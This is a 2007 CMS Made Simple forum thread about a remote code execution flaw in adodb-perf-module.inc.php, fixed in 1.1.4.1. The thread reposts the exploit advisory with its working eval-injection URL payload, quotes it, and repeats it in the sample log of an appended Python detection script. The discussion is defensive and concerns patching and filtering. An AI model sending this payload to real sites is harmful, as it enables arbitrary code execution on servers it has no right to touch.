I ran across this today..
I saw the version in the title...
it's probably old, and already taken care of, but I thought I'd post it here just in case.
John
http://securityreason.com/exploitalert/2811
Topic : CMS Made Simple 1.2 Remote Code Execution Vulnerability
ExploitAlert : 2811
Credit : irk4z
Date : 24.9.2007
Exploit Code :
# vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability
# author: irk4z@yahoo.pl
# download: http://dev.cmsmadesimple.org/frs/downlo ... adesimple-1.1.2.zip
# dork: "powered by CMS Made Simple version 1.1.2"
# greetz: cOndemned, kacper, str0ke
# code:
/lib/adodb_lite/adodb-perf-module.inc.php:
...
eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
...
# exploit:
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=[ PHPCODE ]
CMS Made Simple 1.2 Remote Code Execution Vulnerability
- johnbmcdonald
- Forum Members
- Posts: 60
- Joined: Mon May 14, 2007 8:01 pm
Last edited by johnbmcdonald on Tue Oct 30, 2007 10:30 pm, edited 1 time in total.
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
Hello John,
thank you for reporting this.
Filter people, filter against []//(){} and such in the HTTP requests before they reach PHP whatever version of CMSms.
johnbmcdonald wrote: # exploit:
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=[ PHPCODE ]
Pierre M.
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
I believe this is only with version 1.1.2, if I read correctly?
This is from the link:
"CMS Made Simple 1.1.2 Remote Code Execution Vulnerability"
- johnbmcdonald
- Forum Members
- Posts: 60
- Joined: Mon May 14, 2007 8:01 pm
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
I saw the 1.1.2 as well, but I went ahead and posted it because of the version in the title. I figured it's better safe than sorry.
John
-
- Support Guru
- Posts: 8169
- Joined: Tue Oct 19, 2004 6:44 pm
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
Those vulnerabilities were fixed in 1.1.4.1
Please post system information from "Extensions >> System Information" (there is a bbcode option) on all posts asking for assistance.
--------------------
If you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
I like John's "better safe than sorry". It is unsafe to "not check" if the exploit has gone or not.
Moreover it is compatible with my "better filtered than not". Filter, people, filter.
Of course, thanks to the dev team for having responded and fixed the issue.
Pierre M.
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
Well, I just had my site shut down by my host because of this same exploit. (apparently)
I'm here looking for a way to close the access--whatever it is. Certainly not my area of expertise. I'm running CMSMS 1.2 and according to my hosting company, the script that was exploited was adodb-perf-module.inc.php
I'm asking for more details from them so I can protect my site properly—and continue to use the submission form I had.
I see a suggestion here that input be filtered, but I'm not sure exactly where and how I would implement such a filter. Anyone care to share some suggestions on this?
thanks...
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
Well, I found what I needed...great thread on using the .htaccess file to keep things clean.
http://forum.cmsmadesimple.org/index.ph ... 45.15.html
thanks...
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
eternity (n); 1. infinite time, 2. a seemingly long or endless time, 3. the length of time it takes a frozen pizza to cook when you're starving.
4,930,000,000 (n); 1. a very large number, 2. the approximate world population in 1986 when Microsoft Corp issued its IPO. 3. Microsoft's net profit (USD) for the quarter (3 months) ending 31 March 2007.
CMSMS migration and setup services | Hosting with CMSMS installed and ready to go | PM me for Info
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
Well done kermit! Thank you.
kermit wrote: URL Filtering added to the wiki:
This is how the documentation improves. And security too.
Pierre
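Added example, not part of the original thread or the CMSMS project: a Python triage script for web-server access logs that applies the filtering advice discussed above, flagging direct requests to `.inc.php` include files and query parameters that carry the characters Pierre M. lists. The function names, the Combined Log Format assumption, the extra `;` and `$` characters and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Characters named in the thread's filtering advice ("[]//(){}"). ';' and '$'
# are an added assumption: an injected PHP statement normally needs them.
META = set("[](){};$")
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')


def risky_params(target):
    """Names of query parameters whose decoded value has code-like characters."""
    names = []
    for pair in filter(None, target.partition("?")[2].split("&")):
        name, _, value = map(unquote_plus, pair.partition("="))
        if META & set(value) or "//" in value:
            names.append(name)
    return names


def triage(log_lines):
    """Return (client, status, path, reasons) per flagged Combined Log Format line."""
    findings = []
    for line in log_lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target, status = m.groups()
        path = unquote_plus(target.partition("?")[0]).lower()
        reasons = []
        if path.endswith(".inc.php"):
            reasons.append("direct request to include file")
        params = risky_params(target)
        if params:
            reasons.append("code-like characters in: " + ", ".join(params))
        if reasons:
            findings.append((client, int(status), path, reasons))
    return findings


# Constructed sample lines (documentation IP ranges, made-up times and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Oct/2007:21:58:02 +0000] "GET /index.php?page=news HTTP/1.1" 200 8123',
    '203.0.113.7 - - [30/Oct/2007:22:01:44 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo(); HTTP/1.1" 200 41200',
    '192.0.2.33 - - [30/Oct/2007:22:05:10 +0000] "GET /index.php?mact=Search,cntnt01,dosearch,0&q=a+(b) HTTP/1.1" 200 6410',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

The third sample line is an ordinary search that the character check alone flags, so a request carrying both reasons is the higher-confidence signal and a blanket character filter needs exceptions for legitimate input.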